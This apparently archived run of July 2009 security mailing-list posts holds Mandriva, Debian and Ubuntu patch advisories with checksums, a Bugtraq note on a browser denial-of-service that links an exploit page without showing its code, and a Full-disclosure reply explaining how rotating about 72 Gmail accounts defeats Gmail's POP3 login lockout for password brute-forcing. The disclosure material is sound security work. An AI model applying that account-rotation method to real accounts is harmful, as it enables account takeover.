2008.1/x86_64/dhcp-relay-3.0.7-0.1mdv2008.1.x86_64.rpm 8266ddf83f89615eba128653992f1d53 2008.1/x86_64/dhcp-server-3.0.7-0.1mdv2008.1.x86_64.rpm a77a2457b18c1451351a76fdb7472c78 2008.1/SRPMS/dhcp-3.0.7-0.1mdv2008.1.src.rpm Corporate 3.0: 54de1bbf4b39ab3a9189dd5fa5fa corporate/3.0/i586/dhcp-client-3.0.7-0.1.C30mdk.i586.rpm 7b678eb4757dfcb400bbc4097ad60b78 corporate/3.0/i586/dhcp-common-3.0.7-0.1.C30mdk.i586.rpm 54b63fd21aa07368e2ffc56878bd58e8 corporate/3.0/i586/dhcp-devel-3.0.7-0.1.C30mdk.i586.rpm 031fec5d8ea648f653235d0bcc215914 corporate/3.0/i586/dhcp-relay-3.0.7-0.1.C30mdk.i586.rpm fef3b9e4299b4a677a589b07d3bf6ac5 corporate/3.0/i586/dhcp-server-3.0.7-0.1.C30mdk.i586.rpm 72105849e3d42b6d83a65b310c05d6a6 corporate/3.0/SRPMS/dhcp-3.0.7-0.1.C30mdk.src.rpm Corporate 3.0/X86_64: 2b10597ec3d80e8cb38e5a1b6b3f5b01 corporate/3.0/x86_64/dhcp-client-3.0.7-0.1.C30mdk.x86_64.rpm 81ff104ac3e7c3a8debb4f72a1dfafb4 corporate/3.0/x86_64/dhcp-common-3.0.7-0.1.C30mdk.x86_64.rpm 14a42d70ed2f1a4e7f267b1479d7eadf corporate/3.0/x86_64/dhcp-devel-3.0.7-0.1.C30mdk.x86_64.rpm dfc169a8914abff0e70a15febfc3dfae corporate/3.0/x86_64/dhcp-relay-3.0.7-0.1.C30mdk.x86_64.rpm 4165cd0129634cdf83d456b3151263fc corporate/3.0/x86_64/dhcp-server-3.0.7-0.1.C30mdk.x86_64.rpm 72105849e3d42b6d83a65b310c05d6a6 corporate/3.0/SRPMS/dhcp-3.0.7-0.1.C30mdk.src.rpm Corporate 4.0: bc1ecfae06371e69e63fc8efc17f8e94 corporate/4.0/i586/dhcp-client-3.0.7-0.1.20060mlcs4.i586.rpm 6550db5984ae72454cfa9ad5592374fe corporate/4.0/i586/dhcp-common-3.0.7-0.1.20060mlcs4.i586.rpm f9ab642c59ec5852cf55fe0745df76c1 corporate/4.0/i586/dhcp-devel-3.0.7-0.1.20060mlcs4.i586.rpm 3bf8441409e0f9af6969e28bce5ab306 corporate/4.0/i586/dhcp-relay-3.0.7-0.1.20060mlcs4.i586.rpm a8cfab133de36ba8ccd5aa0e43695e2b corporate/4.0/i586/dhcp-server-3.0.7-0.1.20060mlcs4.i586.rpm 3fe6c892410037196e1d1b7e1e26d406 corporate/4.0/SRPMS/dhcp-3.0.7-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 1b9536b1c2b83aa3ccc1902e741326ae corporate/4.0/x86_64/dhcp-client-3.0.7-0.1.20060mlcs4.x86_64.rpm d68e0b712210df499dcde1a03c046f56 corporate/4.0/x86_64/dhcp-common-3.0.7-0.1.20060mlcs4.x86_64.rpm 71797753f8f4ca74598060e437012d59 corporate/4.0/x86_64/dhcp-devel-3.0.7-0.1.20060mlcs4.x86_64.rpm ec1ca4d3d07e5a73c8cdff3ff2ef8bc3
DoS vulnerabilities in Firefox, Internet Explorer, Opera and Chrome
Hello Bugtraq! I want to warn you about Denial of Service vulnerabilities in Firefox, Internet Explorer, Opera and Chrome. Recently buffer overflow vulnerability in Mozilla Firefox 3.5 was found by Andrew Haynes and Simon Berry-Byrne (http://websecurity.com.ua/3337/). After I checked at 16.07.2009 this vulnerability in different browsers, I found that this Denial of Service vulnerability also exists in Firefox 3.0.11, Internet Explorer 6 and Opera 9.52 (and later also in Chrome 2.0.172). DoS: http://websecurity.com.ua/uploads/2009/Firefox,%20IE%20%20Opera%20DoS%20Exploit2.html With this exploit Firefox crashes, IE6 consumes resources of CPU and RAM, Opera freezes at that consumes resources of CPU and RAM, and Chrome crashes. Vulnerable version is Mozilla Firefox 3.0.11 and previous versions (and also Firefox 3.5). Vulnerable version is Internet Explorer 6 (6.0.2900.2180) and previous versions. And potentially next versions (IE7 and IE8). Vulnerable version is Opera 9.52 and previous versions (and potentially next versions too). Vulnerable version is Google Chrome 2.0.172 and previous versions. At that Google Chrome 1.0.154.48 is not vulnerable - it's possible that vulnerable is only Chrome 2.x. I mentioned about this vulnerability at my site (http://websecurity.com.ua/3338/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua !DSPAM:4a63581b324852108813753!
[SECURITY] [DSA 1839-1] New gst-plugins-good0.10 packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1839-1 secur...@debian.org http://www.debian.org/security/ Steffen Joeris July 19, 2009 http://www.debian.org/security/faq - Package: gst-plugins-good0.10 Vulnerability : integer overflow Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2009-1932 Debian Bugs: 531631 532352 It has been discovered that gst-plugins-good0.10, the GStreamer plugins from the good set, are prone to an integer overflow, when processing a large PNG file. This could lead to the execution of arbitrary code. For the stable distribution (lenny), this problem has been fixed in version 0.10.8-4.1~lenny2. For the oldstable distribution (etch), this problem has been fixed in version 0.10.4-4+etch1. Packages for the s390 and hppa architectures will be released once they are available. For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 0.10.15-2. We recommend that you upgrade your gst-plugins-good0.10 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.4.orig.tar.gz Size/MD5 checksum: 1894794 88aa3c31909ed467605ed04434474c4d http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.4-4+etch1.dsc Size/MD5 checksum: 1576 4369a23f0e8576377918d7d07d6328dd http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gst-plugins-good0.10_0.10.4-4+etch1.diff.gz Size/MD5 checksum:24338 e5b085ae2275c9da0af25175f65c7baf Architecture independent packages: http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-doc_0.10.4-4+etch1_all.deb Size/MD5 checksum:95182 11e977d541258f5bb44fcfa9725544be alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.4-4+etch1_alpha.deb Size/MD5 checksum:36152 824c86b12c45a27350e4aa619e032152 http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.4-4+etch1_alpha.deb Size/MD5 checksum: 701616 03d794c04e432e88e63d46fae06280a1 http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.4-4+etch1_alpha.deb Size/MD5 checksum: 1724576 290c5da8efa9ca0fb8d891e972dd0d3a amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.4-4+etch1_amd64.deb Size/MD5 checksum: 1732384 18059f6e0ad6e22d30cd37f67e805242 http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.4-4+etch1_amd64.deb Size/MD5 checksum: 657520 38e793fe7760a4c0ff377c2334312672 http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.4-4+etch1_amd64.deb Size/MD5 checksum:35932 07678ef5b78b7d92e558432780249b53 arm architecture (ARM) http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.4-4+etch1_arm.deb Size/MD5 checksum: 1682156 eae4e709d2092212c332a38584a0b02b http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.4-4+etch1_arm.deb Size/MD5 checksum:36330 c66b476327a3a8af4ff2007df3195ad9 http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good_0.10.4-4+etch1_arm.deb Size/MD5 checksum: 648606 7eaca1b32d4f041fd8a470b4d2cde52d i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-plugins-good-dbg_0.10.4-4+etch1_i386.deb Size/MD5 checksum: 1663280 57029198e3d83aa970ab33d6ca350b39 http://security.debian.org/pool/updates/main/g/gst-plugins-good0.10/gstreamer0.10-esd_0.10.4-4+etch1_i386.deb Size/MD5 checksum:35760 5edf5708f77639289fe677ed7ca2e420
[USN-805-1] Ruby vulnerabilities
=== Ubuntu Security Notice USN-805-1 July 20, 2009 ruby1.8, ruby1.9 vulnerabilities CVE-2009-0642, CVE-2009-1904 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libruby1.8 1.8.4-1ubuntu1.7 ruby1.8 1.8.4-1ubuntu1.7 Ubuntu 8.04 LTS: libruby1.8 1.8.6.111-2ubuntu1.3 ruby1.8 1.8.6.111-2ubuntu1.3 Ubuntu 8.10: libruby1.8 1.8.7.72-1ubuntu0.2 libruby1.9 1.9.0.2-7ubuntu1.2 ruby1.8 1.8.7.72-1ubuntu0.2 ruby1.9 1.9.0.2-7ubuntu1.2 Ubuntu 9.04: libruby1.8 1.8.7.72-3ubuntu0.1 libruby1.9 1.9.0.2-9ubuntu1.1 ruby1.8 1.8.7.72-3ubuntu0.1 ruby1.9 1.9.0.2-9ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that Ruby did not properly validate certificates. An attacker could exploit this and present invalid or revoked X.509 certificates. (CVE-2009-0642) It was discovered that Ruby did not properly handle string arguments that represent large numbers. An attacker could exploit this and cause a denial of service. (CVE-2009-1904) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.7.diff.gz Size/MD5:50134 5f4a5f8b0673daefc2d23f8a6c26de5b http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.7.dsc Size/MD5: 1037 bd31d154e2bf758ba2f4c70d4fb701de http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4.orig.tar.gz Size/MD5: 4308915 2994203e0815ea978965de34287c5ea2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/irb1.8_1.8.4-1ubuntu1.7_all.deb Size/MD5: 207960 63fd11d90068191477668a8b94093133 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/rdoc1.8_1.8.4-1ubuntu1.7_all.deb Size/MD5: 272810 244403ec49ffed4bc7b6edfb42bdf3c1 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ri1.8_1.8.4-1ubuntu1.7_all.deb Size/MD5: 758734 40b1ddeeacc1edda07d86fbc80f9fa24 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-elisp_1.8.4-1ubuntu1.7_all.deb Size/MD5: 182718 ec46c528f8647433fb627568f26b2d8e http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/ruby1.8-examples_1.8.4-1ubuntu1.7_all.deb Size/MD5: 214970 f28c3d8c6c50dfb8c4a0d02c2e29221c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-1ubuntu1.7_amd64.deb Size/MD5: 1041246 3d3c6df2d9abfa229fb2ac46545592dd http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-1ubuntu1.7_amd64.deb Size/MD5: 1508222 adae95adb02ac3c57fcafb4ee17fae16 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-1ubuntu1.7_amd64.deb Size/MD5: 718734 384c516841a05e15436d6ce962901dd0 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8_1.8.4-1ubuntu1.7_amd64.deb Size/MD5: 189960 e3bd07da796d8a7b898c1ffabd957afb http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libdbm-ruby1.8_1.8.4-1ubuntu1.7_amd64.deb Size/MD5: 170390 3793c0fa4350318de80fc4894567606a http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libgdbm-ruby1.8_1.8.4-1ubuntu1.7_amd64.deb Size/MD5: 171572 b2ed8ff5dc43d05c6a604c340a8c0eb6 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libopenssl-ruby1.8_1.8.4-1ubuntu1.7_amd64.deb Size/MD5: 275240 e45db5b9a283e609e301533ee807e04c http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libreadline-ruby1.8_1.8.4-1ubuntu1.7_amd64.deb Size/MD5: 171018 2c4f774419fa7c5e7bc8f7dc6c868d82 http://security.ubuntu.com/ubuntu/pool/universe/r/ruby1.8/libtcltk-ruby1.8_1.8.4-1ubuntu1.7_amd64.deb Size/MD5: 1798814 81a0b86c8ca778f4f42e20d58e0b20e5 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8-dbg_1.8.4-1ubuntu1.7_i386.deb Size/MD5: 871448 4d6f830a139d5667e4baadaff5ef0386 http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/libruby1.8_1.8.4-1ubuntu1.7_i386.deb Size/MD5: 1421876 65f3ea4868bbe4c84ecb69aa3638dfbc http://security.ubuntu.com/ubuntu/pool/main/r/ruby1.8/ruby1.8-dev_1.8.4-1ubuntu1.7_i386.deb Size/MD5:
[ MDVSA-2009:154 ] dhcp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:154 http://www.mandriva.com/security/ ___ Package : dhcp Date: July 19, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: A vulnerability has been found and corrected in ISC DHCP: ISC DHCP Server is vulnerable to a denial of service, caused by the improper handling of DHCP requests. If the host definitions are mixed using dhcp-client-identifier and hardware ethernet, a remote attacker could send specially-crafted DHCP requests to cause the server to stop responding (CVE-2009-1892). This update provides fixes for this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1892 http://xforce.iss.net/xforce/xfdb/51717 ___ Updated Packages: Mandriva Linux 2008.1: 29b8a0935610d6d6d0192fe02aa302f8 2008.1/i586/dhcp-client-3.0.7-0.2mdv2008.1.i586.rpm 12003e3d73e8e24b19688349f6ac9dee 2008.1/i586/dhcp-common-3.0.7-0.2mdv2008.1.i586.rpm a9af0e8028d6a63ff698e70af5aec43a 2008.1/i586/dhcp-devel-3.0.7-0.2mdv2008.1.i586.rpm 73f9a51fc2b5a6692b854a592be9f714 2008.1/i586/dhcp-doc-3.0.7-0.2mdv2008.1.i586.rpm 20ee01cb125211a2f8479085cc5ba83b 2008.1/i586/dhcp-relay-3.0.7-0.2mdv2008.1.i586.rpm 359f660886b803ec247e8ee59af120a5 2008.1/i586/dhcp-server-3.0.7-0.2mdv2008.1.i586.rpm ff73135449184c87f4bba6d82cf31ff1 2008.1/SRPMS/dhcp-3.0.7-0.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 7a9008113ba3bb2bd8ea56b2c20a542f 2008.1/x86_64/dhcp-client-3.0.7-0.2mdv2008.1.x86_64.rpm 2380b88cd58a86e7a0169ba7f0d603a4 2008.1/x86_64/dhcp-common-3.0.7-0.2mdv2008.1.x86_64.rpm 7f27140edfbb3bdf3d8ed5e9c1b0920f 2008.1/x86_64/dhcp-devel-3.0.7-0.2mdv2008.1.x86_64.rpm 20dbd08ae173f66a650089f6d6386c3f 2008.1/x86_64/dhcp-doc-3.0.7-0.2mdv2008.1.x86_64.rpm bfc0548cf71d25ecac28291fe68fdbdc 2008.1/x86_64/dhcp-relay-3.0.7-0.2mdv2008.1.x86_64.rpm 97dea3fb3ae4f36c391886774cce151d 2008.1/x86_64/dhcp-server-3.0.7-0.2mdv2008.1.x86_64.rpm ff73135449184c87f4bba6d82cf31ff1 2008.1/SRPMS/dhcp-3.0.7-0.2mdv2008.1.src.rpm Mandriva Linux 2009.0: 2f69ac19c6cf2b28abaa9896d9780d61 2009.0/i586/dhcp-client-3.0.7-1.4mdv2009.0.i586.rpm 17495906e37600d564136da9f6630aff 2009.0/i586/dhcp-common-3.0.7-1.4mdv2009.0.i586.rpm 40a2a1567311125891524f7ab78a00c8 2009.0/i586/dhcp-devel-3.0.7-1.4mdv2009.0.i586.rpm 6aab312f879917e5ad18b8d71a2c01fc 2009.0/i586/dhcp-doc-3.0.7-1.4mdv2009.0.i586.rpm 5cb02b748989146b23d16fd4f652f41d 2009.0/i586/dhcp-relay-3.0.7-1.4mdv2009.0.i586.rpm 3840694bb31b4a3fcfe0831f2e3df6de 2009.0/i586/dhcp-server-3.0.7-1.4mdv2009.0.i586.rpm a7043fae8204b185a29f58df4368701c 2009.0/SRPMS/dhcp-3.0.7-1.4mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b2c5a8403220d7ecb023825c46b0258b 2009.0/x86_64/dhcp-client-3.0.7-1.4mdv2009.0.x86_64.rpm 36658f344a6fb8a59714e1c6ea1b4bdd 2009.0/x86_64/dhcp-common-3.0.7-1.4mdv2009.0.x86_64.rpm 3174da37f260dbcd73656a8f0248d3b5 2009.0/x86_64/dhcp-devel-3.0.7-1.4mdv2009.0.x86_64.rpm e4ae61d08c4e1f43c28351164204b685 2009.0/x86_64/dhcp-doc-3.0.7-1.4mdv2009.0.x86_64.rpm 3c5998087fa8f08337d588262742ca87 2009.0/x86_64/dhcp-relay-3.0.7-1.4mdv2009.0.x86_64.rpm a5cfbe4e11c79d5ed56381b8dbf4185b 2009.0/x86_64/dhcp-server-3.0.7-1.4mdv2009.0.x86_64.rpm a7043fae8204b185a29f58df4368701c 2009.0/SRPMS/dhcp-3.0.7-1.4mdv2009.0.src.rpm Mandriva Linux 2009.1: 7ee14bb6be785f85466aa3295ef38c95 2009.1/i586/dhcp-client-4.1.0-5.2mdv2009.1.i586.rpm bae2305f153533012fc0ac75f21f51e0 2009.1/i586/dhcp-common-4.1.0-5.2mdv2009.1.i586.rpm 670d4f9f86ac82bbabd5b1724ebb3523 2009.1/i586/dhcp-devel-4.1.0-5.2mdv2009.1.i586.rpm 50e0b3512a0a1020fff852bf6d7d7a24 2009.1/i586/dhcp-doc-4.1.0-5.2mdv2009.1.i586.rpm 774d4b4217b6ee8245d2eead10727965 2009.1/i586/dhcp-relay-4.1.0-5.2mdv2009.1.i586.rpm 91f3f111a6114f4a8a548018ca6ee997 2009.1/i586/dhcp-server-4.1.0-5.2mdv2009.1.i586.rpm c4c0602219cde4f9c26083133d44aad2 2009.1/SRPMS/dhcp-4.1.0-5.2mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 507e724bc7f2409ced3ed30d107ecaf1 2009.1/x86_64/dhcp-client-4.1.0-5.2mdv2009.1.x86_64.rpm 3741f852b50138ced6c9264d26ef481d 2009.1/x86_64/dhcp-common-4.1.0-5.2mdv2009.1.x86_64.rpm 401fa1872372bde23e68c18204d6612e 2009.1/x86_64/dhcp-devel-4.1.0-5.2mdv2009.1.x86_64.rpm db3408468c018f848802b86258a7d9a0 2009.1/x86_64/dhcp-doc-4.1.0-5.2mdv2009.1.x86_64.rpm 9ff8a987bcac37069165abbb7a2b92d8 2009.1/x86_64/dhcp-relay-4.1.0-5.2mdv2009.1.x86_64.rpm 8e2793c3291e9d74a0410ac1840d3209
[ MDVSA-2009:157 ] perl-Compress-Raw-Zlib
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:157 http://www.mandriva.com/security/ ___ Package : perl-Compress-Raw-Zlib Date: July 19, 2009 Affected: 2008.1, 2009.0, 2009.1 ___ Problem Description: A vulnerability has been found and corrected in perl-Compress-Raw-Zlib: Off-by-one error in the inflate function in Zlib.xs in Compress::Raw::Zlib Perl module before 2.017, as used in AMaViS, SpamAssassin, and possibly other products, allows context-dependent attackers to cause a denial of service (hang or crash) via a crafted zlib compressed stream that triggers a heap-based buffer overflow, as exploited in the wild by Trojan.Downloader-71014 in June 2009 (CVE-2009-1391). This update provides fixes for this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1391 ___ Updated Packages: Mandriva Linux 2008.1: 720caf9ee97c5ebb97788cda22430474 2008.1/i586/perl-Compress-Raw-Zlib-2.008-2.1mdv2008.1.i586.rpm 7f40a9c58953b5113e367bce0b50feae 2008.1/SRPMS/perl-Compress-Raw-Zlib-2.008-2.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 08566d7972592448896119e2d6be14d4 2008.1/x86_64/perl-Compress-Raw-Zlib-2.008-2.1mdv2008.1.x86_64.rpm 7f40a9c58953b5113e367bce0b50feae 2008.1/SRPMS/perl-Compress-Raw-Zlib-2.008-2.1mdv2008.1.src.rpm Mandriva Linux 2009.0: eb2dcbd9ec2cc7c68ad6827632e0d56c 2009.0/i586/perl-Compress-Raw-Zlib-2.015-1.1mdv2009.0.i586.rpm 4c685d20a473c7a03102199bf5a312ea 2009.0/SRPMS/perl-Compress-Raw-Zlib-2.015-1.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: d5430d9ce8fefd3119995688a698e0fd 2009.0/x86_64/perl-Compress-Raw-Zlib-2.015-1.1mdv2009.0.x86_64.rpm 4c685d20a473c7a03102199bf5a312ea 2009.0/SRPMS/perl-Compress-Raw-Zlib-2.015-1.1mdv2009.0.src.rpm Mandriva Linux 2009.1: a2f1d44f210f3205ae2da200c8143a61 2009.1/i586/perl-Compress-Raw-Zlib-2.015-2.1mdv2009.1.i586.rpm 46da1ca46fe6207fecdfded8084992f1 2009.1/SRPMS/perl-Compress-Raw-Zlib-2.015-2.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 132aa7ff9b5f4493a8f9e0c7606e8e2a 2009.1/x86_64/perl-Compress-Raw-Zlib-2.015-2.1mdv2009.1.x86_64.rpm 46da1ca46fe6207fecdfded8084992f1 2009.1/SRPMS/perl-Compress-Raw-Zlib-2.015-2.1mdv2009.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKY4jtmqjQ0CJFipgRAgunAKDm3HDgfqNSvXzuk1iHKn646rPT3ACgwdGj 8TGuXpt+xoY2DdAMPMPmyH8= =XoLG -END PGP SIGNATURE-
[SECURITY] [DSA 1837-1] New dbus packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1837-1 secur...@debian.org http://www.debian.org/security/ Steffen Joeris July 18, 2009 http://www.debian.org/security/faq - Package: dbus Vulnerability : programming error Problem type : local Debian-specific: no CVE Id : CVE-2009-1189 Debian Bug : 532720 It was discovered that the dbus_signature_validate function in dbus, a simple interprocess messaging system, is prone to a denial of service attack. This issue was caused by an incorrect fix for DSA-1658-1. For the stable distribution (lenny), this problem has been fixed in version 1.2.1-5+lenny1. For the oldstable distribution (etch), this problem has been fixed in version 1.0.2-1+etch3. Packages for ia64 and s390 will be released once they are available. For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 1.2.14-1. We recommend that you upgrade your dbus packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3.diff.gz Size/MD5 checksum:20482 fd114e50577aade0211a25bc05ac064d http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2.orig.tar.gz Size/MD5 checksum: 1400278 0552a9b54beb4a044951b7cdbc8fc855 http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3.dsc Size/MD5 checksum: 824 0befb91739de13f92197336b6a3f3f06 Architecture independent packages: http://security.debian.org/pool/updates/main/d/dbus/dbus-1-doc_1.0.2-1+etch3_all.deb Size/MD5 checksum: 1622204 67e2242179a8af1f3a7363d0d9728702 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_alpha.deb Size/MD5 checksum: 289142 2da5aaed2ca0e1dfe4627f2d51923a1a http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_alpha.deb Size/MD5 checksum: 184834 a14af28f5651f06cd41f4aa8b264d486 http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_alpha.deb Size/MD5 checksum: 378214 95128d7c15be44464dd1a785788fdc3d http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_alpha.deb Size/MD5 checksum: 403766 5facc50da806d2f82a1ca839e045035d amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_amd64.deb Size/MD5 checksum: 279294 6b0085ce0a01a81a13b068759de269b8 http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_amd64.deb Size/MD5 checksum: 348654 4d1f1c1d5c074be51b777b93b332eaf7 http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_amd64.deb Size/MD5 checksum: 363928 54ed19ba7cbd0dd3475827c6e6df5acf http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_amd64.deb Size/MD5 checksum: 184200 e5bc33b1e7dbfea9c372a3056e3f1848 arm architecture (ARM) http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_arm.deb Size/MD5 checksum: 343960 e7c6c2269903d8dbd4422103a9e1edaf http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_arm.deb Size/MD5 checksum: 265322 4e7ce3fca8c685e540092e70474e6fbd http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_arm.deb Size/MD5 checksum: 330958 cee5e85136606605bd290035d9452f90 http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_arm.deb Size/MD5 checksum: 183240 d7e3c477f4f4fbbc49c04b035e92ff2a hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_hppa.deb Size/MD5 checksum: 374136 7d297f74e9fde26e726f06f321208dae http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_hppa.deb Size/MD5 checksum: 286074 0a55d6aa6400d4d5750ebd92e9de7aab http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_hppa.deb Size/MD5 checksum: 362166 013680aca7b38c66292a8727855bfc06
Re: [Full-disclosure] [ISecAuditors Security Advisories] Gmail vulnerable to automated password cracking
Hi Chris, cev...@google.com wrote: Hi Vicente, As was explained by my colleague Neel Mehta in his reply, this is not a vulnerability. I must express my disagreement. I consider that if someone can automate the process of password cracking, exist a security problem. I have programmed a Python script that implements the process that I explain in the proof of concept paragraph, and it has allowed me to run thousands of automated requests and obtain the password of one of my test accounts. Gmail has all sorts of additional limits on password brute forcing. The confusion here is the difference between login incorrect (due to bad password) and login incorrect (due to excessive login attempts). This protection kicks in after a small number of failed attempts, after which even correct credentials will not be accepted. You can't tell the difference in the UI you are using, so it's understandable to have missed these extra limits. A malicious user can abuse the feature Check for mail using POP3 for realize the automatic process of password cracking. As you comment, using this feature exist a lock (for 2 hours) for authentication attempts, and beyond this limit (100 requests) the message returned by the application does not allow to known if the analyzed password is correct or not. However, every 2 hours an attacker could make 100 authentication attempts. To overcome this limit (100 authentication attempts), it is sufficient that the attacker has other Gmail accounts. Each account allows the malicious user to make 100 new auhtentication attempts within 2 hours of the blockade. If the attacker wants to make an authentication attempt by second and to avoid the blockage then will need to make 3600 requests per hour. This requires that the malicious user dispose of 3600/100 = 36 Gmail accounts. As there is a blockage of 2 hours, with 72 Gmail accounts the attacker can reuse the initial account (eg accoun...@gmail.com) after finishing the 100 authentication attempts with the last Gmail account (eg accoun...@gmail.com). I hope that I have clarified the matter. Best regards, -- _ Vicente Aguilera Díaz Director Auditoría CISA, CISSP, ITIL CEH Instructor, ECSP 